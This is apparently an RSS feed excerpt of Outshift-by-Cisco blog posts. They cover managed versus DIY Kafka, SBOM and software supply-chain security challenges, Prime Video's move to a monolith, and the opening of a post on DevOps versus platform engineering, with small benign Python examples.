&lt;li&gt;Setting up the infrastructure and storage&lt;/li&gt;
&lt;li&gt;Installing and configuring Kafka&lt;/li&gt;
&lt;li&gt;Setting up Apache ZooKeeper™, if you must. (ZooKeeper is deprecated and will no longer be supported as of Kafka 4.0. After that point, Kafka will use KRaft, the Kafka Raft consensus protocol.)&lt;/li&gt;
&lt;li&gt;Monitoring and troubleshooting your clusters&lt;/li&gt;
&lt;li&gt;Securing the deployment&lt;/li&gt;
&lt;li&gt;Scaling horizontally and vertically&lt;/li&gt;
&lt;li&gt;Replicating data (for disaster recovery and availability)&lt;/li&gt;
&lt;/ul&gt;
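&lt;p&gt;To get a feel for the scaling and storage planning in that list, here's a back-of-the-envelope sizing sketch in Python. The workload numbers are hypothetical, and a real estimate would also need headroom for indexes, compaction, and growth:&lt;/p&gt;

```python
def estimate_storage_gb(write_mb_per_sec, retention_days, replication_factor=3):
    """Rough Kafka storage estimate: raw ingest x retention x replication."""
    seconds = retention_days * 24 * 60 * 60
    raw_gb = write_mb_per_sec * seconds / 1024
    return raw_gb * replication_factor

# Hypothetical workload: 5 MB/s sustained writes, 7-day retention, RF=3
total = estimate_storage_gb(5, 7, 3)
print(f"~{round(total)} GB of cluster storage")
```

&lt;p&gt;Even at a modest 5 MB/s of sustained writes, a week of retention at the common replication factor of three lands in multi-terabyte territory, which is part of why "DIY is not always cheaper."&lt;/p&gt;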

&lt;p&gt;&lt;strong&gt;Is "managed" Kafka really more manageable?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;"Managed" Kafka is a service you can purchase from some hyperscalers, such as Amazon Web Services, and other third-party vendors. While the initial cost of the service may give you sticker shock, you may save money on hosting and payroll in the long run. Note that some managed solutions may still require your team to have some level of Kafka expertise on board, especially during the setup phase.&lt;/p&gt;

&lt;p&gt;With managed Kafka, you may give up some control over your data residency. What's more, if you're not sure how much compute or storage space you'll need, you may end up with some surprise hosting costs.&lt;/p&gt;

&lt;p&gt;While each Kafka vendor's exact offering varies a bit, hosted solutions include setup of the cloud infrastructure necessary to run Kafka clusters, including virtual machines, network, storage, backups, and security.&lt;/p&gt;

&lt;p&gt;Most managed solutions (whether or not they include hosting) provide features that:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Install and manage the Kafka software, including upgrades, patches, and security fixes.&lt;/li&gt;
&lt;li&gt;Monitor Kafka clusters for issues, such as running out of memory or storage space, and provide alerts or notifications when problems arise. These solutions usually also include tools for troubleshooting and resolving problems like the above.&lt;/li&gt;
&lt;li&gt;Ensure that data stored in Kafka clusters is durable and available by replicating data across multiple nodes and data centers.&lt;/li&gt;
&lt;li&gt;Perform a variety of additional functions, depending on the solution. For example, they may make it easy to add functionality—such as schema management, connectors, and ksqlDB—that lets you integrate with other data systems, transform data, and build real-time applications.&lt;/li&gt;
&lt;/ul&gt;
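&lt;p&gt;The monitoring and alerting bullet above boils down to threshold checks against broker metrics. Here's a minimal, illustrative sketch; the metric names and limits are made up, and real managed services watch far more signals:&lt;/p&gt;

```python
def check_broker(metrics, thresholds):
    """Return alert strings for every metric at or over its limit."""
    alerts = []
    for name, limit in thresholds.items():
        value = metrics.get(name, 0)
        if value >= limit:
            alerts.append(f"{name} at {value}%, limit {limit}%")
    return alerts

# Hypothetical broker metrics, as percent utilization
metrics = {"disk_used": 92, "heap_used": 61}
thresholds = {"disk_used": 85, "heap_used": 80}
print(check_broker(metrics, thresholds))
```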

&lt;p&gt;&lt;strong&gt;What to consider as you sort through the options&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Your Kafka deployment will be as unique as your environment. You'll need to account for your cloud provider, the size of your deployment, the applications you're running, and the size of your company, among other factors.&lt;/p&gt;

&lt;p&gt;In some companies, there may be two departments involved—one to install the clusters and set up the infrastructure and another to "administer" Kafka, which includes setting up topics, configuring the producers and consumers, and connecting it all to the rest of your application(s). Even if you have folks on board with some Kafka experience, they may not have the knowledge they need to set it up in a cloud or Kubernetes environment. So you may have to hire in this skill set or get training for your existing staff. It may take them a while to come up to speed. This indirect cost may not be trivial, especially for a smaller organization.&lt;/p&gt;

&lt;p&gt;If you do have to hire folks, think through the range of tasks you might want them to work on. Who should you choose? As you search, keep in mind that many of the most qualified folks won't have the word "Kafka" in their titles. However, a quick search on LinkedIn turned up a few of the job titles that do:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Kafka site reliability engineer (SRE)&lt;/li&gt;
&lt;li&gt;Staff software engineer, Kafka&lt;/li&gt;
&lt;li&gt;Kafka admin&lt;/li&gt;
&lt;li&gt;Kafka developer&lt;/li&gt;
&lt;li&gt;Kafka engineer&lt;/li&gt;
&lt;li&gt;Kafka support engineer&lt;/li&gt;
&lt;li&gt;Java developer with Kafka&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Salary requirements for these folks will vary, depending on your location, the seniority of your candidates, the specific job responsibilities, and so on.&lt;/p&gt;

&lt;p&gt;If you're a larger company, you may need to divide up the job by function (infrastructure and development). In smaller companies, you may want to hire folks who will have responsibilities beyond just your Kafka deployment. Either way, this is one of the major costs associated with DIY Kafka.&lt;/p&gt;

&lt;p&gt;With a managed solution, you won't need as much Kafka expertise on board, since your provider will take care of most of the operational tasks involved. That said, as mentioned earlier, some solutions may still require you to perform a significant number of setup tasks. You'll still need staff to build your Kafka-based applications and/or integrate them into your application ecosystem.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hosted versus non-hosted solutions&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Depending on the Kafka solution you're considering, you'll need to think about hosting. While this is obvious in the DIY scenario, there are still decisions to make with managed Kafka. Some providers, such as Confluent and Amazon Managed Streaming for Apache Kafka (MSK), include cloud hosting as part of their solutions. Others, such as Aiven and Outshift's Calisti, are not hosted solutions. Still others, such as Instaclustr, give you the option to run your Kafka deployment in their cloud environment or use your own. So you'll need to factor in cloud cost and convenience as you make your choices.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hybrid open source solutions&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you like the idea of using some of the features available in a managed Kafka solution but still want some control over your data, cloud compute, and storage, consider using an open source solution. An example is &lt;a href="https://github.com/banzaicloud/koperator"&gt;Koperator&lt;/a&gt;, a Kubernetes operator that automates provisioning, management, autoscaling, and operations for Kafka clusters deployed to Kubernetes. Koperator provisions secure, production-ready Kafka clusters and provides fine-grained configuration and advanced topic and user management through custom resources. Have a look at Koperator's &lt;a href="https://github.com/banzaicloud/koperator/blob/master/README.md"&gt;readme.md&lt;/a&gt; and feel free to contribute to the project.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://eti.cisco.com/open-source"&gt;Learn more&lt;/a&gt; about Outshift open source and &lt;a href="http://eti.cisco.com/slack"&gt;join our Slack community&lt;/a&gt; to be part of the conversation.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Securing the Software Supply Chain: The Struggle Is (Still) Real  </title>
      <dc:creator>Brianna Blacet</dc:creator>
      <pubDate>Wed, 07 Jun 2023 00:29:15 +0000</pubDate>
      <link>https://dev.to/ciscoemerge/securing-the-software-supply-chain-the-struggle-is-still-real-180k</link>
      <guid>https://dev.to/ciscoemerge/securing-the-software-supply-chain-the-struggle-is-still-real-180k</guid>
      <description>&lt;p&gt;If you're reading this, you already know that the cloud has transformed everything about how we develop and consume software. You also know that one of the biggest changes is the fact that almost all enterprise software now includes open-source components, which has supercharged development velocity and innovation.&lt;/p&gt;

&lt;p&gt;But open source software (OSS) brings security risks, as well. To be clear, OSS itself isn't inherently less secure than other software. But there's a compound effect: if there's a vulnerability and/or an exploit in a particular OSS package—and that software is used by thousands of other software packages (lookin' at you, Log4Shell)—the problem will spread faster than chickenpox in kindergarten. It is this potential for far-reaching consequences that has prompted regulators to step in to help identify vulnerable systems and the root cause of security incidents.&lt;/p&gt;

&lt;p&gt;Just over two years ago, U.S. President Biden issued an Executive Order directing (among other things) the National Institute of Standards and Technology (NIST) to issue guidance that would include standards, procedures, or criteria to enhance the security of the software supply chain, including "providing a purchaser a Software Bill of Materials (SBOM) for each product."&lt;/p&gt;

&lt;p&gt;However, despite the mandate, NIST's governance, and the work of private industry and OSS organizations, software supply-chain security remains a troublesome problem.&lt;/p&gt;

&lt;p&gt;The following are a few reasons why.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reason #1: The SBOM standards aren't standardized&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;With the help of the Cybersecurity &amp;amp; Infrastructure Security Agency (CISA) and Office of Management and Budget (OMB), NIST released &lt;a href="https://www.nist.gov/system/files/documents/2021/07/09/Critical%20Software%20Use%20Security%20Measures%20Guidance.pdf"&gt;the guidance&lt;/a&gt; the White House asked for in 2021 and &lt;a href="https://www.nist.gov/system/files/documents/2022/05/24/Cybersecurity%20Labeling%20for%20Consumers%20under%20Executive%20Order%2014028%20on%20Improving%20the%20Nation%27s%20Cybersecurity%20Report%20%28FINAL%29.pdf"&gt;updated it&lt;/a&gt; in 2022 in its Special Publication 800-161, "Supply Chain Risk Management Practices for Federal Information Systems and Organizations." The publication included measures for managing supply-chain risks, including the use of SBOMs. It also referenced the minimum set of elements an SBOM should contain, as established by the National Telecommunications and Information Administration (NTIA) (more on this later).&lt;/p&gt;

&lt;p&gt;Since that publication, other SBOM formats have emerged, including the Linux Foundation's Software Package Data Exchange® (SPDX®) Specification Version 2.3 and CycloneDX (a flagship project of Open Worldwide Application Security Project®, or OWASP). NTIA recommends coupling SPDX with Software Identification tags, or SWIDs (XML files associated with specific software products).&lt;/p&gt;

&lt;p&gt;I looked up the word "standard" in the Merriam-Webster dictionary, which defined it as "something established by authority, custom, or general consent as a model, example, or point of reference." The lack of consensus around SBOM formats means they don't yet meet this definition.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--LJRK3HBo--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3n15jfzn24gx6qntjmb5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--LJRK3HBo--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3n15jfzn24gx6qntjmb5.png" alt="Image borrowed from xkcd.com: A webcomic of romance, sarcasm, math, and language." width="500" height="283"&gt;&lt;/a&gt; &lt;em&gt;Above image borrowed from &lt;a href="https://xkcd.com/927/"&gt;xkcd.com: A webcomic of romance, sarcasm, math, and language.&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I admit that I'm no expert on standards or SBOMs (or anything beyond making chili and the proper use of semicolons). But it seems we haven't yet arrived at the "standard" part of standardization. This seems problematic. It's critical that we come together as a community to decide on what information we find important and attest to how we will derive it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reason #2: The amount of data contained in an "acceptable" SBOM may not be adequate&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;As I mentioned earlier, Biden's 2021 Executive Order also required the NTIA to produce minimal specifications for SBOMs, which it did (see the result &lt;a href="https://ntia.gov/sites/default/files/publications/sbom_minimum_elements_report_0.pdf"&gt;here&lt;/a&gt;). Those specs included the following:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The name of the software component&lt;/li&gt;
&lt;li&gt;The version number or identifier of the component&lt;/li&gt;
&lt;li&gt;A unique identifier for the component&lt;/li&gt;
&lt;li&gt;Information about the license under which the component is distributed&lt;/li&gt;
&lt;li&gt;Information about the dependencies of the component, including the names and versions of other components it relies on&lt;/li&gt;
&lt;li&gt;The platform or operating system for which the component is intended&lt;/li&gt;
&lt;li&gt;A cryptographic hash value used to verify the integrity of the component&lt;/li&gt;
&lt;li&gt;A brief description of the component and its functionality&lt;/li&gt;
&lt;li&gt;Information about the supplier or vendor of the component, such as name and contact details&lt;/li&gt;
&lt;li&gt;Information about known vulnerabilities associated with the component&lt;/li&gt;
&lt;li&gt;Information about the component's development, maintenance, and support lifecycle&lt;/li&gt;
&lt;li&gt;Information or references to evidence supporting the claims made in the SBOM&lt;/li&gt;
&lt;/ul&gt;
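&lt;p&gt;In code, checking a component entry against a minimum-elements list is straightforward. The field names below only paraphrase the NTIA elements and are illustrative, not an official schema:&lt;/p&gt;

```python
# These keys paraphrase the NTIA minimum elements; they are illustrative,
# not an official field list.
REQUIRED_FIELDS = {
    "name", "version", "unique_id", "license",
    "dependencies", "supplier", "hash",
}

def missing_fields(component):
    """Return which minimum-element fields a component entry lacks."""
    return sorted(REQUIRED_FIELDS - component.keys())

component = {
    "name": "log4j-core",
    "version": "2.17.1",
    "supplier": "Apache Software Foundation",
}
print(missing_fields(component))
```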

&lt;p&gt;"These fields aim to provide transparency and improve the understanding of software components and their associated risks in the supply chain," NTIA wrote. "However, it's important to note that the specific fields included in an SBOM may vary depending on the requirements and context of the organization or industry using it."&lt;/p&gt;

&lt;p&gt;The agency knew it was walking a fine line. Manufacturers and developers would be less likely to comply if the agency required too many fields. If it required too few fields, there wouldn't be enough information for the SBOM to be useful. &lt;/p&gt;

&lt;p&gt;Was it the right balance? It depends on who you ask. Just last week, a colleague of mine said, "I just saw my first SBOM. I have to admit, I was underwhelmed." In his opinion, there was not enough information to trace a vulnerability if it became necessary to do so.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reason #3: There are multiple ways to generate SBOMs&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;In its "Innovation Insight for SBOMs," &lt;a href="https://www.gartner.com/en/documents/4011501"&gt;Gartner&lt;/a&gt; notes that SBOMs should not be static documents and that they should be updated with each new release of a software component. The analyst firm advises organizations to select SBOM tools that:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Create SBOMs during the build process&lt;/li&gt;
&lt;li&gt;Analyze source code and binaries (like container images)&lt;/li&gt;
&lt;li&gt;Generate SBOMs for those artifacts&lt;/li&gt;
&lt;li&gt;Edit SBOMs&lt;/li&gt;
&lt;li&gt;View, compare, import, and validate SBOMs in a human-readable format&lt;/li&gt;
&lt;li&gt;Merge and translate SBOM contents from one format or file type to another&lt;/li&gt;
&lt;li&gt;Support use of SBOM manipulation in other tools via APIs and libraries&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;There are a variety of tools on the market that generate SBOMs, all of them with different bells and whistles. Some come bundled with scanning tools. Some are standalone. Some, like &lt;a href="https://github.com/opensbom-generator/spdx-sbom-generator"&gt;Open SBOM's SPDX SBOM Generator&lt;/a&gt;, generate only one SBOM format. Others, such as &lt;a href="https://fossa.com/lp/simplify-sbom-generation-fossa"&gt;Fossa&lt;/a&gt;, support multiple SBOM formats. Some can be run locally via a CLI.&lt;/p&gt;
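&lt;p&gt;To make the output of such tools concrete, here's a toy generator that emits a minimal CycloneDX-flavored JSON document. Real generators record far more detail (hashes, licenses, dependency graphs), so treat this purely as a shape illustration:&lt;/p&gt;

```python
import json

def toy_sbom(components):
    """Emit a minimal CycloneDX-flavored document (toy; real tools add much more)."""
    return json.dumps({
        "bomFormat": "CycloneDX",
        "specVersion": "1.4",
        "components": [
            {"type": "library", "name": name, "version": version}
            for name, version in components
        ],
    }, indent=2)

print(toy_sbom([("requests", "2.31.0"), ("urllib3", "2.0.4")]))
```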

&lt;p&gt;Outshift by Cisco's &lt;a href="https://panoptica.app/"&gt;Panoptica&lt;/a&gt; uses the latest industry standards to sign and verify software, including sigstore keyless, symmetric, and asymmetric code signing, to make sure your software is secure and reliable. You can use its free tier—which supports 15 nodes and one cluster—forever. &lt;/p&gt;

&lt;p&gt;One challenge that has yet to receive much attention is the issue of integrating multiple SBOMs. In her &lt;a href="https://techblog.cisco.com/blog/kubeclarity-multi-sbom-integration"&gt;blog&lt;/a&gt;, "KubeClarity: Multi SBOM Integration," author Pallavi Kalapatapu compares using Trivy and Syft, both open-source analyzers that can generate SBOMs for containerized applications. She notes that both of these tools have unique strengths and weaknesses when detecting libraries in a container.&lt;/p&gt;

&lt;p&gt;"Managing multiple Software Bill of Materials (SBOMs) may seem quite challenging, given the complexities of handling a single one," she writes, adding that integrating multi-SBOM helps increase the coverage and accuracy of detection.&lt;/p&gt;

&lt;p&gt;Kalapatapu describes how &lt;a href="https://github.com/openclarity/kubeclarity"&gt;KubeClarity&lt;/a&gt; (an open source tool that detects and manages SBOMs and scans for vulnerabilities in container images and filesystems) ingests various SBOM formats and converts them into the native format required by vulnerability scanners. Since each vulnerability scanner expects SBOMs in specific formats, merging SBOMs involves the bulk of the work, requiring careful balancing and standardization of inputs to ensure compatibility.&lt;/p&gt;
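&lt;p&gt;The core of that merging step can be sketched as a union of component lists keyed on name and version. This is a simplification; KubeClarity also has to reconcile differing formats and metadata, which this toy version ignores:&lt;/p&gt;

```python
def merge_components(*sboms):
    """Union component lists from several scanners, deduping on (name, version)."""
    seen = {}
    for sbom in sboms:
        for comp in sbom:
            seen.setdefault((comp["name"], comp["version"]), comp)
    return list(seen.values())

# Hypothetical scanner outputs for the same container image
trivy_components = [{"name": "openssl", "version": "3.0.8"}]
syft_components = [{"name": "openssl", "version": "3.0.8"},
                   {"name": "zlib", "version": "1.2.13"}]

print(len(merge_components(trivy_components, syft_components)))  # 2 unique components
```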

&lt;p&gt;&lt;strong&gt;Beyond the SBOM: So, what's next?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;According to the panelists in a recent &lt;a href="https://www.youtube.com/watch?v=t2MqINqqqIU"&gt;webinar&lt;/a&gt; featuring several prominent industry experts, building software supply-chain security into solutions is crucial to avoid pipeline modification and increase adoption, but information interchange and trust remain complex challenges. Modifying the CI/CD pipeline to bolt on security measures will likely reduce adoption, whereas building security into the solutions themselves will increase it. Supply-chain security must be addressed at the component level, and while managing fleets of applications may require commercial products, developers cannot rely on commercial solutions alone to solve the problem.&lt;/p&gt;

&lt;p&gt;At the end of the day, the interchange of information and trust remains a complex challenge in software supply-chain security, and the responsibility for this exchange lies with vendors. There are a multitude of problems we'll need to address as we work on solutions. &lt;/p&gt;

&lt;p&gt;Let me know your thoughts about SBOMs and software supply-chain management in the comments and don't forget to  &lt;a href="https://join.slack.com/t/outshift/shared_invite/zt-1rw2jl0ht-yNdyFgBFlc~yzo9AnE4FbA"&gt;connect with Outshift on Slack&lt;/a&gt;!&lt;/p&gt;

</description>
      <category>opensource</category>
      <category>sbom</category>
      <category>supplychainsecurity</category>
    </item>
    <item>
      <title>Is the Monolith Making a Comeback?</title>
      <dc:creator>Brianna Blacet</dc:creator>
      <pubDate>Fri, 12 May 2023 23:59:52 +0000</pubDate>
      <link>https://dev.to/ciscoemerge/is-the-monolith-making-a-comeback-2o2e</link>
      <guid>https://dev.to/ciscoemerge/is-the-monolith-making-a-comeback-2o2e</guid>
      <description>&lt;p&gt;Last week, I posted a blog that addressed the question of whether platform engineering was "the new DevOps." I mentioned that although Gartner had included platform engineering in its hype cycle for emerging technology in 2022, it actually pre-dated DevOps by several years. Time warp!&lt;/p&gt;

&lt;p&gt;Of course, this phenomenon is not unique. Case in point: 1970s-era platform boots are back in style, too. Maybe the "everything that's old is new again" fashion merry-go-round holds true for technology, as well.&lt;/p&gt;

&lt;p&gt;Then again, maybe not.&lt;/p&gt;

&lt;p&gt;A &lt;a href="https://www.primevideotech.com/video-streaming/scaling-up-the-prime-video-audio-video-monitoring-service-and-reducing-costs-by-90"&gt;recent blog&lt;/a&gt; by Marcin Kolny, a Senior Software Development Engineer for Amazon Prime Video, left a lot of people wondering whether monolithic applications were destined to make a comeback. Kolny talked about how the Prime Video team had shifted away from the serverless Amazon Web Services (AWS) Lambda, moving its monitoring service to a (gasp!) monolithic model. The disclosure sent shockwaves rippling throughout the cloud-native community.&lt;/p&gt;

&lt;p&gt;"While onboarding more streams to the service, we noticed that running the infrastructure at a high scale was very expensive. We also noticed scaling bottlenecks that prevented us from monitoring thousands of streams. So, we took a step back and revisited the architecture of the existing service, focusing on the cost and scaling bottlenecks," he wrote. "Moving our service to a monolith reduced our infrastructure cost by over 90%. It also increased our scaling capabilities. Today, we're able to handle thousands of streams and we still have capacity to scale the service even further."&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Let the wild rumpus begin&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Unsurprisingly, people had #feelings—lots of them. To many in the cloud-native community, Kolny's admission seemed to insinuate that it's both too difficult and too expensive to scale with distributed/serverless architecture. That did not sit well with a former Docker executive, who even called it "an embarrassment."&lt;/p&gt;

&lt;p&gt;Others, such as former AWS engineer Daniel Vassallo, had the opposite reaction. "Everyone is surprised Amazon Prime Video is ditching Lambda for a monolith. I saw Lambda being born, and understood it inside out. I was never convinced it would become a suitable application host," he &lt;a href="https://twitter.com/dvassallo/status/1654880475603935232"&gt;wrote on Twitter&lt;/a&gt;. He attributed Prime Video's adoption to AWS leadership forcing serverless technology down the throats of the rest of the company.&lt;/p&gt;

&lt;p&gt;This assertion was &lt;a href="https://twitter.com/jrhunt/status/1655112658528657408"&gt;disputed&lt;/a&gt; by Randall Hunt, another former AWS employee. "I have no idea why [Vassallo] is crafting this absurd narrative that AWS leadership was pushing Lambda. Half of them had no idea what Lambda was. The idea that AWS leadership has any input into tech decisions is kind of laughable." &lt;em&gt;Touché.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Kelsey Hightower, a lauded software engineer, developer advocate, and pre-eminent speaker in the cloud-native community, had a different take. He &lt;a href="https://twitter.com/kelseyhightower/status/1654098279116992513"&gt;commented&lt;/a&gt; that the blog wasn't meant to be a dig against Lambda, the platform that helped the Prime Video team build the service fast and get to market. "It is a testament to the overhead of microservices in the real world," he wrote. "Moving data around is typically an underestimated cost." He added that a monolithic architecture doesn't mean a spaghetti code base. "You should be writing modular code regardless of the deployment model."&lt;/p&gt;

&lt;p&gt;Arun Gupta, author, Vice President, and General Manager of Open Ecosystem Initiatives at Intel Corporation—an open source strategist, advocate, and practitioner for over two decades—agreed with Hightower. "Between #microservices and #monolith, there is NORA (No One Right Answer)," he &lt;a href="https://twitter.com/arungupta/status/1655608857421565953"&gt;tweeted&lt;/a&gt;. "&lt;a class="mentioned-user" href="https://dev.to/primevideo"&gt;@primevideo&lt;/a&gt; used microservices to get started quickly but then moved to monolith to scale (hard scaling limit at 5% of expected load) and reduce costs by 90%."&lt;/p&gt;

&lt;p&gt;Replying to Gupta, Mike Chenetz, Head of Product Marketing at Cisco's Emerging Technology &amp;amp; Incubation Group, and host of the CloudUnfiltered podcast, responded, "I totally agree!"&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;When all you've got is a hammer, everything looks like a nail&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Since Chenetz happens to be my manager and gave me the idea for this blog, I probed him for further thoughts on the topic. "Too many people will pick their platform and program to that platform," he said. "It's backwards. You should first think about the needs of the application, then back into the platform that meets your needs. It might be Kubernetes, maybe monoliths, maybe both."&lt;/p&gt;

&lt;p&gt;He explained that trends are irrelevant. "Think about memory, distribution, scalability, latency," he continued. "What are the needs of that application? What are the needs of the components of that application? This is where architects are supposed to come in."&lt;/p&gt;

&lt;p&gt;The issue goes beyond comparing microservices to monoliths, Chenetz explained. "The same goes for Kubernetes. The big corporations started doing it. But it doesn't make sense for startups. You need teams to manage Kubernetes. You don't just spin up one or two Kubernetes clusters and then say, 'I'm done.'"&lt;/p&gt;

&lt;p&gt;David Heinemeier Hansson, creator of Ruby on Rails and co-owner and CTO of 37signals (creators of Basecamp and HEY), echoed Gupta's and Chenetz' sentiments. In a blog entitled "&lt;a href="https://world.hey.com/dhh/how-to-recover-from-microservices-ce3803cc"&gt;How to recover from microservices&lt;/a&gt;," he wrote, "Remember that even the likes of GitHub and Shopify run their main applications as monoliths with millions of lines of code and have thousands of programmers collaborating on them. Do you have many more millions of lines of code or thousands of programmers working on the same code bases? If not, exercise extreme caution before even thinking about microservices."&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The right tool for the right job&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Jan Schulte, a former Senior Software Engineer for a now-defunct German consulting firm called Asquera GmbH, cautioned that it's important to avoid being seduced by "shiny object syndrome." "Sure, the hot, new shiny thing in tech is cool…but only as long as it actually helps you to get stuff shipped," he said.&lt;/p&gt;

&lt;p&gt;Schulte explained that it made sense for the Prime Video team to kick off its service with Lambda, since it helped them get to market quickly. Likewise, it made sense to switch to a monolithic architecture once the service had matured and the team wanted more control. "If you're a software engineer, does it matter to you to run your startup code the same way a Fortune 500 company does, just so you can say 'I run my code the same way Amazon does?' Or would you rather ship new features, bug fixes consistently and provide a reliable experience?"&lt;/p&gt;

&lt;p&gt;The latter, he said, should be what engineers focus on. "Every software project is unique. To generally say 'monoliths are bad' or 'microservices are dead now, since someone on the Amazon Prime Video team said something' is really comparing apples with oranges. It's all about choosing the right tool for the job at every stage along the way."&lt;/p&gt;

&lt;p&gt;All that said, what do YOU think? Was Kolny's blog a bold move, a crazy one, or a humble discussion of the learning process his team had gone through? What are your thoughts about the costs and benefits of monolithic architecture? Let me know in the comments!&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;center&gt;We'd love to meet you. &lt;a href="https://join.slack.com/t/outshift/shared_invite/zt-1rw2jl0ht-yNdyFgBFlc~yzo9AnE4FbA"&gt;Connect with Outshift on Slack&lt;/a&gt;!&lt;/center&gt;&lt;/em&gt;&lt;/p&gt;

</description>
      <category>cloudnative</category>
      <category>microservices</category>
      <category>monolith</category>
      <category>aws</category>
    </item>
    <item>
      <title>Is DevOps Dead? Is Platform Engineering the “New DevOps”? The Final Word.</title>
      <dc:creator>Brianna Blacet</dc:creator>
      <pubDate>Fri, 05 May 2023 20:58:54 +0000</pubDate>
      <link>https://dev.to/ciscoemerge/is-devops-dead-is-platform-engineering-the-new-devops-the-final-word-5ahg</link>
      <guid>https://dev.to/ciscoemerge/is-devops-dead-is-platform-engineering-the-new-devops-the-final-word-5ahg</guid>
      <description>&lt;p&gt;There’s been a boatload of blogs, Twitter threads, and articles published over the last several months musing over the question of whether DevOps as we know it is withering away into the archives of O’Reilly oblivion. It’s an interesting (and often amusing) mix of commentary that reflects conflicting notions about what DevOps actually is. &lt;/p&gt;

&lt;p&gt;For example, in a &lt;a href="https://platformengineering.org/talks-library/devops-aint-dead-but-we-gotta-talk"&gt;blog&lt;/a&gt; entitled “DevOps ain’t dead but… we gotta talk,” Mallory Haigh, Director of Customer Success at &lt;a href="https://humanitec.com/"&gt;Humanitec&lt;/a&gt;, wrote, “DevOps isn’t dead by any means. The field is still evolving…But the picture isn’t perfect. Organizations often do DevOps in problematic ways, and engineers suffer the fallout. From causing daily cognitive load to permanent shellshock, many DevOps setups are just plain broken.”&lt;/p&gt;

&lt;p&gt;In other words, DevOps as a discipline is often misunderstood. While some companies just hire a DevOps engineer and believe they’re “doing DevOps,” they don’t realize that DevOps is not actually a &lt;em&gt;role&lt;/em&gt; in and of itself. Truly effective DevOps, Haigh says, is composed of a culture and methodology wherein developers better understand the infrastructure for which they develop. In her characteristic sardonic style, she writes, “They commit to a mistaken ideal by declaring, ‘You build it, you run it—and you just have to suck it up and deal with it.’” &lt;/p&gt;

&lt;p&gt;Gartner analyst Lydia Leong, in an &lt;a href="https://cloudpundit.com/2022/03/28/cloud-self-service-doesnt-need-to-invite-the-orc-apocalypse/"&gt;article on CloudPundit&lt;/a&gt;, sizes the situation up a bit differently. She writes that developer responsibility and/or control over infrastructure shouldn't be an all-or-nothing proposition. ”Responsibility can be divided across the application life cycle…without necessarily parachuting your developers into an untamed and unknown wilderness and wishing them luck in surviving because it’s not an Infrastructure &amp;amp; Operations (I&amp;amp;O) team problem anymore.”&lt;/p&gt;

&lt;p&gt;Leong says that the solution lies in finding the right balance between “Dev” and “Ops” in DevOps. She notes that this sweet spot will be different for every organization. It’s a delicate equation that requires conversations about “autonomy, governance, and collaboration, and no two organizations are likely to arrive at the exact same balance.”&lt;/p&gt;

&lt;p&gt;Taking the issue a step further, Sid Palas’ widely quoted &lt;a href="https://twitter.com/sidpalas/status/1551936840453820417?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1551936840453820417%7Ctwgr%5E8f65a818401e9d21891e45549079f833f8b41cf4%7Ctwcon%5Es1_&amp;amp;ref_url=https%3A%2F%2Fthenewstack.io%2Fdevops-is-dead-embrace-platform-engineering%2F"&gt;Twitter thread&lt;/a&gt; reads, “Most developers don't like dealing with infrastructure. They want to write code and run it somewhere but don't care much where that is.” &lt;/p&gt;

&lt;p&gt;An &lt;a href="https://www.infoworld.com/article/3669477/devs-don-t-want-to-do-ops.html"&gt;InfoWorld article&lt;/a&gt; penned by managing editor Scott Carey, entitled “Devs don’t want to do ops” prompted a &lt;a href="https://www.reddit.com/r/devops/comments/wusvc9/devs_dont_want_to_do_ops/"&gt;raucous Reddit romp&lt;/a&gt; that continued the debate: “The article is kinda right? I mean, most of the devs I worked with didn't want to &lt;em&gt;learn&lt;/em&gt; ops, they were just using the ops role recklessly. For example setting PHP memory limit to -1 and f--k it.” Another Redditor wrote, “Who cares what some disgruntled devs want. The author of that book was probably talking about the fact that devs don't want to be concerned with the infrastructure itself but would handle the engineering aspect of it through software.” &lt;/p&gt;

&lt;p&gt;While my personal opinion is that Reddit is the cesspool of the Internet, the latter comment is where the issue actually starts to get teeth. Because maybe the root of the problem with DevOps isn’t about whether developers want to “do” ops. Maybe they’re just overwhelmed. Maybe the problem that needs addressing is that most companies are simply doing DevOps &lt;em&gt;wrong&lt;/em&gt;. &lt;/p&gt;

&lt;p&gt;Haigh’s take is that the DevOps methodology is morphing into an approach that focuses on enablement and engagement, so IT teams can grow within their infrastructure and cloud-native environments in a sustainable way. And that, she says, is where platform engineering comes in. &lt;/p&gt;

&lt;h2&gt;
  
  
